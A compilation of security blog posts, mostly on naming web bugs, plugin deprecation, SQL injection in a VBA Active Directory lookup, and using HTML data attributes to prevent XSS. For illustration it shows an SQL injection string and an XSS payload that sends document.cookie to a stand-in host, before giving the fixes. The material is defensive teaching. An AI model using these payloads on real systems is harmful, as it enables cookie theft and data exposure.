“Oh, that should only take a couple of days, because all we need to do is encode the contents of the field.”

“No, again, that’s the Cross-Site Scripting bug. We already discussed that.”

“I wish you’d make it clear what you’re talking about.”

Yeah, me too.

A modest proposal

The whole point of the word “Cross” as used in the descriptions of these bugs is to indicate that someone is doing something they shouldn’t – and in that respect, it’s pretty much a completely irrelevant word, because we’re already discussing attack types.

In many of these cases, the words “Cross-Site” bring absolutely nothing to the discussion, and just make things confusing. Am I crossing a site from one page to another, or am I saying this attack occurs between sites? What if there’s no other site involved, is that still a cross-site scripting attack? [Yes, but that’s an irrelevant question, and by asking it, or thinking about asking/answering it, you’ve reduced your mental processing abilities to handle the actual issue.]

Check yourself when you utter “cross” as the first word in the description of an attack, and ask if you’re communicating something of use, or just “sounding like a proper InfoSec tool”. Consider whether there’s a better term to use.

I’ve previously argued that “Cross-Site Scripting” is really a poor term for the conflation of HTML Injection and JavaScript Injection.

Cross-Frame Scripting is really Click-Jacking (and yes, that doesn’t exclude clickjacking activities done by a keyboard or other non-mouse source).

Cross-Site Request Forgery is more of a Forced Action – an attacker can guess what URL would cause an action without further user input, and can cause a user to visit that URL in a hidden manner.

Cross-Site History Manipulation is more of a browser failure to protect SOP – I’m not an expert in that field, so I’ll leave it to them to figure out a non-confusing name.

Cross-Site Tracing is just getting silly – it’s Cross-Site Scripting (excuse me, HTML Injection) using the TRACE verb instead of the GET verb. If you allow TRACE, you’ve got bigger problems than XSS.

Cross-User Defacement crosses all the way into crosstalk, requiring as it does that two users be sharing the same TCP connection with no adequate delineation between them. This isn’t really common enough to need a name that gets capitalised. It’s HTTP Response-Splitting over a shared proxy with shitty user segregation.

Even more modestly…

I don’t remotely anticipate that I’ll change the names people give to these vulnerabilities in scanning tools or in pen-test reports.

But I do hope you’ll be able to use these to stop confusion in its tracks, as I did:

“Never mind cross-whatever, let’s talk about how long it’s going to take you to address the clickjacking issue.”

In Summary

Here’s the TL;DR version of the web post:

Prevent or interrupt confusion by referring to bugs using the following non-confusing terms:

Confusing | Not Confusing Much, Probably
Cross-Frame Scripting | Clickjacking
Cross-Site History Manipulation | [Not common enough to name]
Cross-Site Tracing | TRACE is enabled
Cross-Site Request Forgery | Forced User Action
Cross-Site Scripting | HTML Injection / JavaScript Injection
Cross-User Defacement | Crappy proxy server

Fear the browsing dead!


Ding dong, the plugin’s dead!

There’s been a lot of celebration lately from the security community about the impending death of Adobe’s Flash, or Oracle’s Java plugin technology.

You can understand this, because for years these plugins have been responsible for vulnerability on top of vulnerability. Their combination of web-facing access and native code execution means that you have maximum exposure and maximum risk concentrated in one place on the machine.

Browser manufacturers have recognised this risk in their own code, and have made great strides in improving security. Plus, you can always switch browsers if you feel one is more secure than another.

Attackers can rely on Flash and Java.

An attacker can pretty much assume that their target is running Flash from Adobe, and Java from Oracle. [Microsoft used to have a competing Java implementation, but Oracle sued it out of existence.]

Bugs in those implementations are widely published, and not widely patched, whether or not patches are available.

Users don’t upgrade applications (plugins included) as often or as willingly as they update their operating system. So, while your browser may be updated with the operating system, or automatically self-update, it’s likely most users are running a version of Java and/or Flash that’s several versions behind.

Applications never die, they just lose their support

As you can imagine, the declaration by Oracle that Java plugin support will be removed is a step forward in recognising the changing landscape of browser security, but it’s not an indication that this is an area in which security professionals can relax.

Just the opposite.

With the deprecation of plugin support comes the following:

  • Known bugs – without fixes. Ever.
  • No availability of tools to manage old versions.
  • No tools to protect vulnerable plugins.
  • Users desperately finding more baroque (and unsecurable) ways to keep their older setups together to continue to use applications which should have been replaced, but never were.

It’s not like Oracle are going to reach into every machine and uninstall / turn off plugin support. Even if they had the technical means to do so, it would be completely inappropriate.

There will be zombies

So, what we’re left with, whenever a company deprecates a product, application or framework, is a group of machines – zombies, if you will – that are operated by people who do not heed the call to cull, and which are going to remain active and vulnerable until such time as someone renders those walking-dead components finally lifeless.

If you’re managing an enterprise from a security perspective, you should follow up every deprecation announcement with a project to decide the impact and schedule the actual death and dismemberment of the component being killed off.

Then you can celebrate!

Assuming, of course, that you followed through successfully on your plan.

Until then, watch out for the zombies.

The Browsing Dead.

Artisan or Labourer?

Back when I started developing code, and that was a fairly long time ago, the vast majority of developers I interacted with had taken that job because they were excited to be working with technology, and enjoyed instructing and controlling computers to an extent that was perhaps verging on the creepy.

Much of what I read about application security strongly reflects this even today, where developers are exhorted to remember that security is an aspect of the overall quality of your work as a developer.

This is great – for those developers who care about the quality of their work. The artisans, if you like.

But who else is there?

For every artisan I meet when talking to developers, there’s about another two or three who are more like labourers.

They turn up on time, they do their daily grind, and they leave on time. Even if the time expected / demanded of them is longer than the usual eight hours a day.

By itself, this isn’t a bad thing. When you need another pair of “OK” and “Cancel” buttons, you want someone to hammer them out, not hand-craft them in bronze. When you need an API to a back-end database, you want it thin and functional, not baroque and beautiful.

Many – perhaps most – of your developers are there to do a job for pay, not because they love code.

And that’s what you interviewed them for, hired them for, and promoted them for.

It’s important to note that these guys mostly do what they are told. They are clever, and can be told to do complex things, but they are not single-mindedly interested in the software they are building, except in as much as you will reward them for delivering it.

What do you tell these guys?

If these developers will build only the software they’re told to build, what are you telling them to build?

At any stage, are you actively telling your developers that they have to adhere to security policies, or that they have to build in any kind of “security best practice”, or even to “think like an attacker”? Much as I hate that phrase – I’d rather you tell them to “think about all the ways every part of your code can fail, and work to prevent them” [“think like a defender”].

Some of your developers will interject their own ideas of quality.

– But –

Most of your developers will only do as they have been instructed, and as their examples tell them.

How does this affect AppSec?

The first thing to note is that you won’t reach these developers just with optional training, and you might not even reach them just with mandatory training. They will turn up to mandatory training, because it is required of them, and they may turn up to optional training because they get a day’s pay for it. But all the appeals to them to take on board the information you’re giving them will fall upon deaf ears, if they return to their desks and don’t get follow-up from their managers.

Training requires management support, management enforcement, and management follow-through.

When your AppSec program makes training happen, your developers’ managers must make it clear to their developers that they are expected to take part, they are expected to learn something, and they are expected to come back and start using and demonstrating what they have learned.

Curiously enough, that’s also helpful for the artisans.

Second, don’t despair about these developers. They are useful and necessary, and as with all binary distinctions, the lines are not black and white, they are a spectrum of colours. There are developers at all stages between the “I turn up at 10, I work until 6 (as far as you know), and I do exactly what I’m told” end and the “I love this software as if it were my own child, and I want to mould it into a perfect shining paragon of perfection” end.

Don’t despair, but be realistic about who you have hired, and who you will hire as a result of your interview techniques.

Work with the developers you have, not the ones you wish you had.

Third, if you want more artisans and fewer labourers, the only way to do that is to change your hiring and promotion techniques.

Screen for quality-biased developers during the interview process. Ask them “what’s wrong with the code”, and reward them for saying “it’s not very easy to understand, the comments are awful, it uses too many complex constructs for the job it’s doing, etc”.

Reward quality where you find it. “We had feedback from one of the other developers on the team that you spent longer on this project than expected, but produced code that works flawlessly and is easy to maintain – you exceed expectations.”

Security is a subset of quality – encourage quality, and you encourage security.

Labourers as opposed to artisans have no internal “quality itch” to scratch, which means quality bars must be externally imposed, measured, and enforced.

What are you doing to reward developers for securing their development?

SQL injection in unexpected places

Every so often, I write about some real-world problems in this blog, rather than just getting excited about generalities. This is one of those times.

1. In which I am an idiot who thinks he is clever

I had a list of users the other day, exported from a partner with whom we do SSO, and which somehow had some duplicate entries in it.

These were not duplicate in the sense of “exactly the same data in every field”, but differed by email address, and sometimes last name. Those of you who manage identity databases will know exactly what I’m dealing with here – people change their last name, through marriage, divorce, adoption, gender reassignment, whim or other reason, and instead of editing the existing entry, a new entry is somehow populated to the list of identities.

What hadn’t changed was that each of these individuals still held their old email address in Active Directory, so all I had to do was look up each email address, relate it to a particular user, and then pull out the canonical email address for that user. [In this case, that’s the first email address returned from AD]

A quick search on the interwebs gave me this as a suggested VBA function to do just that:

Function GetEmail(email As String) As String
    ' Given one of this user's email addresses, find the canonical one.

    ' Find our default domain base to search from
    Set objRootDSE = GetObject("LDAP://RootDSE")
    strBase = "'LDAP://" & objRootDSE.Get("defaultNamingContext") & "'"

    ' Open a connection to AD
    Set ADOConnection = CreateObject("ADODB.Connection")
    ADOConnection.Provider = "ADsDSOObject"
    ADOConnection.Open "Active Directory Provider"

    ' Create a command
    Set ADCommand = CreateObject("ADODB.Command")
    ADCommand.ActiveConnection = ADOConnection

    ' Find user based on their email address
    ADCommand.CommandText = _
        "SELECT distinguishedName,userPrincipalName,mail FROM " & _
        strBase & " WHERE objectCategory='user' AND mail='" & email & "'"

    ' Execute this command
    Set ADRecordSet = ADCommand.Execute

    ' Extract the canonical email address for this user.
    GetEmail = ADRecordSet.Fields("Mail")

    ' Return.
End Function

That did the trick, and I stopped thinking about it. Printed out the source just to demonstrate to a couple of people that this is not rocket surgery.

2. In which I realise I am idiot

Yesterday the printout caught my eye. Here’s the particular line that made me stop:

    ADCommand.CommandText = _
        "SELECT distinguishedName,userPrincipalName,mail FROM " & _
        strBase & " WHERE objectCategory='user' AND mail='" & email & "'"

That looks like a SQL query, doesn’t it?

Probably because it is.

It’s one of two formats that can be used to query Active Directory, the other being the less-readable LDAP syntax.

Both formats have the same problem – when you build the query using string concatenation like this, it’s possible for the input to give you an injection by escaping from the data and into the code.

I checked this out – when I called this function as follows, I got the first email address in the list as a response:

    Debug.Print GetEmail("x' OR mail='*")

You can see my previous SQL injection articles to come up with ideas of other things I can do now that I’ve got the ability to inject.

3. In which I try to be clever again

Normally, I’d suggest developers use Parameterised Queries to solve this problem – and that’s always the best idea, because it not only improves security, but it actually makes the query faster on subsequent runs, because it’s already optimised. Here’s how that ought to look:

    ADCommand.CommandText = _
        "SELECT distinguishedName,userPrincipalName,mail FROM " & _
        strBase & " WHERE objectCategory='user' AND mail=?"

    ' Create and bind parameter
    Set ADParam = ADCommand.CreateParameter("", adVarChar, adParamInput, 40, email)
    ADCommand.Parameters.Append ADParam

That way, the question mark “?” gets replaced with “’youremail@example.com’” (including the single quote marks) and my injection attempt gets quoted in magical ways (usually, doubling single-quotes, but the parameter insertion is capable of knowing in what way it’s being inserted, and how exactly to quote the data).

4. In which I realise other people are idiot

Running that gives me this rather meaningful message:

Run-time error ‘-2147467262 (80004002)’:

No such interface supported

It doesn’t actually tell me which interface isn’t supported, so of course I spend a half hour trying to figure out what changed that might have gone wrong – whether I’m using a question mark where perhaps I might need a named variable, possibly preceded by an “@” sign, but no, that’s SQL stored procedures, which are almost never the SQL injection solution they claim to be, largely because the same idiot who uses concatenation in his web service also does the same stupid trick in his SQL stored procedures, but I’m rambling now and getting far away from the point if I ever had one, so…

The interface that isn’t supported is the ability to set parameters.

The single best solution to SQL injection just plain isn’t provided in the ADODB library and/or the ADsDSOObject provider.

Why on earth would you miss that out, Microsoft?

5. I get clever

So, the smart answer here is input validation where possible, and if you absolutely have to accept any and all input, you must quote the strings that you’re passing in.

In my case, because I’m dealing with email addresses, I think I can reasonably restrict my input to alphanumerics, the “@” sign, full stops, hyphens and underscores.
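As a quick way to try that character set out before committing to it, here is a minimal sketch of the same allow-list check. It is written in JavaScript rather than the VBA used in this post, purely so it can be run in any browser console, and the function name isAllowedEmailInput is made up for illustration.

```javascript
// Hypothetical helper: allow-list check for the character set described above.
function isAllowedEmailInput(email) {
  // Letters, digits, "@", full stop, hyphen and underscore only.
  // The "+" also rejects an empty string.
  return /^[A-Za-z0-9@._-]+$/.test(email);
}

console.log(isAllowedEmailInput("first.last-name_1@example.com")); // true
console.log(isAllowedEmailInput("x' OR mail='*"));                 // false
```

This only says the input is made of harmless characters, not that it is a well-formed email address. For blocking the injection, that is the part that matters.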

Input validation depends greatly on the type of your input. If it’s a string, that will need to be provided in your SQL request surrounded with single quotes – that means that any single quote in the string will need to be encoded safely. Usually that means doubling the quote mark, although you might choose to replace them with double quotes or back ticks.

If your input is a number, you can be more restrictive in your input validation – only those characters that are actually parts of a number. That’s not necessarily as easy as it sounds – the letter “e” is often part of numbers, for instance, and you have to decide whether you’re going to accept bases other than 10. But from the perspective of securing against SQL injection, again that’s not too difficult to enforce.

Finally, of course, you have to decide what to do when bad input comes in – an error response, a static value, throw an exception, ignore the input and refuse to respond, etc. If you choose to signal an error back to the user, be careful not to provide information an attacker could find useful.

What’s useful to an attacker?

Sometimes the mere presence of an error is useful.

Certainly if you feed back to the attacker the full detail of the SQL query that went wrong – and people do sometimes do this! – you give the attacker far too much information.

Even feeding back the incorrect input can be a bad thing in many cases. In the Excel case I’m running into, that’s probably not easily exploitable, but you probably should be cautious anyway – if it’s an attacker causing an error, they may want you to echo back their input to exploit something else.

Call to Microsoft

Seriously, Microsoft, this is an unforgiveable lapse – not only is there no ability to provide the single best protection, because you didn’t implement the parameter interface, but also your own samples provide examples of code that is vulnerable to SQL injections. [Here and here – the other examples I was able to find use hard-coded search filters.]

Microsoft, update your samples to demonstrate how to securely query AD through the ADODB library, and consider whether it’s possible to extend the provider with the parameter interface so that we can use the gold-standard protection.

Call to developers

Parse your parameters – make sure they conform to expected values. Complain to the user when they don’t. Don’t use lack of samples as a reason not to deliver secure components.

Finally – how I did it right

And, because I know a few of you will hope to copy directly from my code, here’s how I wound up doing this exact function.

Please, by all means review it for mistakes – I don’t guarantee that this is correct, just that it’s better than I found originally. For instance, one thing it doesn’t check for is if the user actually has a value set for the “mail” field in Active Directory – I can tell you for certain, it’ll give a null reference error if you have one of these users come back from your search.

Function GetEmail(email As String) As String
    ' Given one of this user's email addresses, find the canonical one.

    ' Pre-execution input validation - email must contain only recognised characters.
    ' The hyphen sits last in the character list so that Like treats it literally.
    If email Like "*[!a-zA-Z0-9_@.-]*" Then
        GetEmail = "Illegal characters"
        Exit Function
    End If

    ' Find our default domain base to search from
    Set objRootDSE = GetObject("LDAP://RootDSE")
    strBase = "'LDAP://" & objRootDSE.Get("defaultNamingContext") & "'"

    ' Open a connection to AD
    Set ADOConnection = CreateObject("ADODB.Connection")
    ADOConnection.Provider = "ADsDSOObject"
    ADOConnection.Open "Active Directory Provider"

    ' Create a command
    Set ADCommand = CreateObject("ADODB.Command")
    ADCommand.ActiveConnection = ADOConnection

    ' Find user based on their email address
    ADCommand.CommandText = _
        "SELECT distinguishedName,userPrincipalName,mail FROM " & _
        strBase & " WHERE objectCategory='user' AND mail='" & email & "'"

    ' Execute this command
    Set ADrecordset = ADCommand.Execute

    ' Post execution validation - we should have exactly one answer.
    If ADrecordset Is Nothing Or (ADrecordset.EOF And ADrecordset.BOF) Then
        GetEmail = "Not found"
        Exit Function
    End If
    If ADrecordset.RecordCount > 1 Then
        GetEmail = "Many matches"
        Exit Function
    End If

    ' Extract the canonical email address for this user.
    GetEmail = ADrecordset.Fields("Mail")

    ' Return.
End Function

As always, let me know if you find this at all useful.

Get on with git

Out with the old

Version control is one of those vital tools for developers that everyone has to use but very few people actually enjoy or understand.

So, it’s with no surprise that I noted a few months ago that the version control software on which I’ve relied for several years for my personal projects, Component Software’s CS-RCS, has not been built on in years, and cannot now be downloaded from its source site. [Hence no link from this blog]

Not so in with the new

I’ve used git before a few times in professional projects while I was working at Amazon, but relatively reluctantly – it has incredibly baroque and meaningless command-line options, and gives the impression that it was written by people who expected their users to be just as proficient with the ins and outs of version control as they are.

While I think it’s a great idea for developers to build software they would use themselves, I think it’s important to make sure that the software you build is also accessible to people who aren’t at the same level of expertise as you. After all, if your users were as capable as the developer, they would already have built the solution for themselves, so your greater user-base comes from accommodating novices to experts with simple points of entry and levels of improved mastery.

git, along with many other open source, community-supported tools, doesn’t really accommodate the novice.

As such, it means that most people who use it rely on “cookbooks” of sets of instructions. “If you want to do X, type commands Y and Z” – without an emphasis on understanding why you’re doing this.

This leads inexorably to a feeling that you’re setting yourself up for a later fall, when you decide you want to do an advanced task, but discover that a decision you’ve made early on has prevented you from doing the advanced task in the way you want.

That’s why I’ve been reluctant to switch to git.

So why switch now?

But it’s clear that git is the way forward in the tools I’m most familiar with – Visual Studio and its surrounding set of developer applications.

It’s one of those decisions I’ve made some time ago, but not enacted until now, because I had no idea how to start – properly. Every git repository I’ve worked with so far has either been set up by someone else, or set up by me, based on a cookbook, for a new project, and in a git environment that’s managed by someone else. I don’t even know if those terms, repository and environment, are the right terms for the things I mean.

There are a number of advanced things I want to do from the very first – particularly, I want to bring my code from the old version control system, along with its history where possible, into the new system.

And I have a feeling that this requires I understand the decisions I make when setting this up.

So, it was with much excitement that I saw a link to this arrive in my email:

[Image: screenshot of the email]

Next thing is I’m going to watch this, and see how I’m supposed to work with git. I’ll let you know how it goes.

HTML data attributes – stop my XSS

First, a disclaimer for the TL;DR crowd – data attributes alone will not stop all XSS, mine or anyone else’s. You have to apply them correctly, and use them properly.

However, I think you’ll agree with me that it’s a great way to store and reference data in a page, and that if you only handle user data in correctly encoded data attributes, you have a greatly-reduced exposure to XSS, and can actually reduce your exposure to zero.

Next, a reminder about my theory of XSS – that there are four parts to an XSS attack – Injection, Escape, Attack and Cleanup. Injection is necessary and therefore can’t be blocked, Attacks are too varied to block, and Cleanup isn’t always required for an attack to succeed. Clearly, then, the Escape is the part of the XSS attack quartet that you can block.

Now let’s set up the code we’re trying to protect – say we want to have a user-input value accessible in JavaScript code. Maybe we’re passing a search query to Omniture (by far the majority of JavaScript Injection XSS issues I find). Here’s how it often looks:

<script>
s.prop1="mysite.com";
s.prop2="SEARCH-STRING";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
s_code=s.t();
if(s_code)
document.write(s_code)//-->
</script>

Let’s suppose that “SEARCH-STRING” above is the string for which I searched.

I can inject my code as a search for:

"-window.open("//badpage.com/"+document.cookie,"_top")-"

The second line then becomes:

s.prop2=""-window.open("//badpage.com/"+document.cookie,"_top")-"";

Yes, I know you can’t subtract two strings, but JavaScript doesn’t know that until it’s evaluated the window.open() function, and by then it’s too late, because it’s already executed the bad thing. A more sensible language would have thrown an error at compile time, but this is just another reason for security guys to hate dynamic languages.
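To make the escape concrete, here is a minimal sketch of the kind of naive templating that produces that line. The renderProp2 function is hypothetical, standing in for whatever server-side code drops the search term into the script block.

```javascript
// Hypothetical template: the search term is pasted straight into script text.
function renderProp2(searchTerm) {
  return 's.prop2="' + searchTerm + '";';
}

const payload = '"-window.open("//badpage.com/"+document.cookie,"_top")-"';
console.log(renderProp2(payload));
// s.prop2=""-window.open("//badpage.com/"+document.cookie,"_top")-"";
```

The leading quote in the payload closes the string the template opened, and everything after it is parsed as code.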

How do data attributes fix this?

A data attribute is an attribute in an HTML tag, whose name begins with the word “data” and a hyphen.

These data attributes can be on any HTML tag, but usually they sit in a tag which they describe, or which is at least very close to the portion of the page they describe.

Data attributes on table cells can be associated with the data within that cell; data attributes on a body tag can be associated with the whole page, or the context in which the page is loaded.

Because data attributes are HTML attributes, quoting their contents is easy. In fact, there are really only a few quoting rules to consider.

  1. The attribute’s value must be quoted, either in double-quote or single-quote characters, but usually in double quotes because of XHTML
  2. Any ampersand (“&”) characters need to be HTML encoded to “&amp;”.
  3. Quote characters occurring in the value must be HTML encoded to “&quot;”.

Rules 2 & 3 can simply be replaced with “HTML encode everything in the value other than alphanumerics” before applying rule 1, and if that’s easier, do that.
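As a minimal sketch of that “encode everything other than alphanumerics” approach, something like the following would do. The helper names htmlEncodeAttr and dataAttr are made up for illustration, and the sketch assumes the attribute name itself comes from your own code, never from the user.

```javascript
// Hypothetical helper: HTML-encode every character except ASCII alphanumerics,
// using numeric character references.
function htmlEncodeAttr(value) {
  return Array.from(String(value), (ch) =>
    /[A-Za-z0-9]/.test(ch) ? ch : "&#" + ch.codePointAt(0) + ";"
  ).join("");
}

// Rule 1: wrap the encoded value in double quotes.
// Assumes "name" is a trusted, hard-coded attribute name.
function dataAttr(name, value) {
  return name + '="' + htmlEncodeAttr(value) + '"';
}

console.log(dataAttr("data-search-term", 'a"b&c'));
// data-search-term="a&#34;b&#38;c"
```

Because the quote and the ampersand never appear raw in the output, the value has no way to close the attribute early.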

Sidebar – why those rules?

HTML parses attribute value strings very simply – look for the first non-space character after the “=” sign, which is either a quote or not a quote. If it’s a quote, find another one of the same kind, HTML-decode what’s in between them, and that’s the attribute’s value. If the first non-space after the equal sign is not a quote, the value ends at the next space character.
Contemplate how these are parsed, and then see if you’re right:

  • <a onclick="prompt("1")">&lt;a onclick="prompt("1")"&gt;</a>

  • <a onclick = "prompt( 1 )">&lt;a onclick = "prompt( 1 )"&gt;</a>

  • <a onclick= prompt( 1 ) >&lt;a onclick= prompt( 1 ) &gt;</a>

  • <a onclick= prompt(" 1 ") >&lt;a onclick= prompt(" 1 ") &gt;</a>

  • <a onclick= prompt( "1" ) >&lt;a onclick= prompt( "1" ) &gt;</a>

  • <a onclick= "prompt( 1 )">&lt;a onclick=&amp;#9;"prompt( 1 )"&gt;</a>

  • <a onclick= "prompt( 1 )">&lt;a onclick=&amp;#32;"prompt( 1 )"&gt;</a>

  • <a onclick= thing=1;prompt(thing)>&lt;a onclick= thing=1;prompt(thing)&gt;</a>

  • <a onclick="prompt(\"1\")">&lt;a onclick="prompt(\"1\")"&gt;</a>

Try each of them (they aren’t live in this document – you should paste them into an HTML file and open it in your browser), see which ones prompt when you click on them. Play with some other formats of quoting. Did any of these surprise you as to how the browser parsed them?

Here’s how they look in the Debugger in Internet Explorer 11:

[Image: the sample tags in the IE11 Debugger]

Uh… That’s not right, particularly line 8. Clearly syntax colouring in IE11’s Debugger window needs some work.

OK, let’s try the DOM Explorer:

[Image: the sample tags in the IE11 DOM Explorer]

Much better – note how the DOM explorer reorders some of these attributes, because it’s reading them out of the Document Object Model (DOM) in the browser as it is rendered, rather than as it exists in the source file. Now you can see which are interpreted as attribute names (in red) and which are the attribute values (in blue).

Other browsers have similar capabilities, of course – use whichever one works for you.

Hopefully this demonstrates why you need to follow the rules of 1) quoting with double quotes, 2) encoding any ampersand, and 3) encoding any double quotes.

Back to the data-attributes

So, now if I use those data-attributes, my HTML includes a number of tags, each with one or more attributes named “data-something-or-other”.

Accessing these tags from basic JavaScript is easy. You first need to get access to the DOM object representing the tag – if you’re operating inside of an event handler, you can simply use the “this” object to refer to the object on which the event is handled (so you may want to attach the data-* attributes to the object which triggers the handler).

If you’re not inside of an event handler, or you want to get access to another tag, you should find the object representing the tag in some other way – usually document.getElementById(…)

Once you have the object, you can query an attribute with the function getAttribute(…) – the single argument is the name of the attribute, and what’s returned is a string – and any HTML encoding in the data-attribute will have been decoded once.

Other frameworks have ways of accessing this data attribute more easily – for instance, jQuery has a “.data(…)” function which will fetch a data attribute’s value.

How this stops my XSS

I’ve noted before that stopping XSS is a “simple” matter of finding where you allow injection, and preventing, in a logical manner, every possible escape from the context into which you inject that data, so that it cannot possibly become code.

If all the data you inject into a page is injected as HTML attribute values or HTML text, you only need to know one function – HTML Encode – and whether you need to surround your value with quotes (in a data-attribute) or not (in HTML text). That’s a lot easier than trying to understand multiple injection contexts each with their own encoding function. It’s a lot easier to protect the inclusion of arbitrary user data in your web pages, and you’ll also gain the advantage of not having multiple injection points for the same piece of data. In short, your web page becomes more object-oriented, which isn’t a bad thing at all.

One final gotcha

You can still kick your own arse.

When converting user input from the string you get from getAttribute to a numeric value, what function are you going to use?

Please don’t say “eval”.

Eval is evil. Just like innerHTML and document.write, its use is an invitation to Cross-Site Scripting.

Use parseFloat() and parseInt(), because they won’t evaluate function calls or other nefarious components in your strings.
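One wrinkle worth knowing is that parseInt() stops at the first character it doesn’t like, so “12abc” quietly becomes 12. Here is a minimal sketch of a stricter conversion, assuming you only want whole numbers; the attrToInt name is made up for illustration.

```javascript
// Hypothetical helper: turn an attribute string into an integer without eval().
function attrToInt(raw) {
  // Accept only an optional sign followed by decimal digits, so "12abc"
  // is rejected rather than silently parsed as 12.
  if (!/^[+-]?\d+$/.test(raw)) return null;
  return Number.parseInt(raw, 10);
}

console.log(attrToInt("42"));       // 42
console.log(attrToInt("12abc"));    // null
console.log(attrToInt("alert(1)")); // null
```

Returning null for anything unexpected leaves the caller to decide what a bad value means, and nothing in the string is ever executed.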

So, now I’m hoping your Omniture script looks like this:

<div id="myDataDiv" data-search-term="SEARCH-STRING"></div>
<script>
s.prop1="mysite.com";
s.prop2=document.getElementById("myDataDiv").getAttribute("data-search-term");
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
s_code=s.t();
if(s_code)
document.write(s_code)//-->
</script>

You didn’t forget to HTML encode your SEARCH-STRING, or at least its quotes and ampersands, did you?

P.S. Omniture doesn’t cause XSS, but many people implementing its required calls do.